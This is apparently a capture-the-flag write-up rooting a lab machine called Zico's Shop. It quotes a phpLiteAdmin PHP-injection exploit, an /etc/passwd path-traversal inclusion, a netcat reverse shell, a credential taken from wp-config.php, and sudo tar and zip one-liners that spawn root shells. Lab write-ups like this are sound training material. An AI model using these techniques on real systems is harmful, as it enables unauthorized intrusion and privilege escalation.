Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico’s Shop
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33247/udp status
| 100024 1 37566/tcp status
| 100024 1 47961/udp6 status
|_ 100024 1 60994/tcp6 status
37566/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:7E:4A:E2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32–3.5
Uptime guess: 198.839 days (since Fri Mar 22 16:33:11 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelFound http port to be useful so let’s start enumerating with it , while using dirsearch i found many useful directory and one of them was having phpliteamin running on it
At daadmin i found phpliteadmin running on it
Logged in using default creds “admin” and got access to it, and followed a phpliteadmin exploit from exploit-db
1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php
Done!
Proof: http://goo.gl/ZqPVLAnd created a new databases as per the exploit , just added reverse shell instead of <?php phpinfo()?>
And got reverse shell from the lif i found at “10.0.0.10/view.php?page=../../../../../../../etc/passwd” just replaced it with “10.0.0.10/view.php?page=../../../../../../../usr/databases/hack.php” and started a nc at my local host
And then i took a proper shell using python -c ‘import pty;pty.spawn(“/bin/bash”)’ and then i moved to home directory of zico user and found wordpress folder , and found zico password at /home/zico/wordpress/wp-config.php switched to zico user using password “sWfCsfJSPV9H3AmQzw8”
Luckily found zico to be sudo user
zico@zico:~/wordpress$ sudo -l
sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
zico@zico:~/wordpress$
Then i use tar command to escalate user privilege
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Got root user
ANOTHER WAY TO ROOT USING ZIP COMMAND
Used
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TFAnd got root
……………………………….COWABUNGA……………………………………
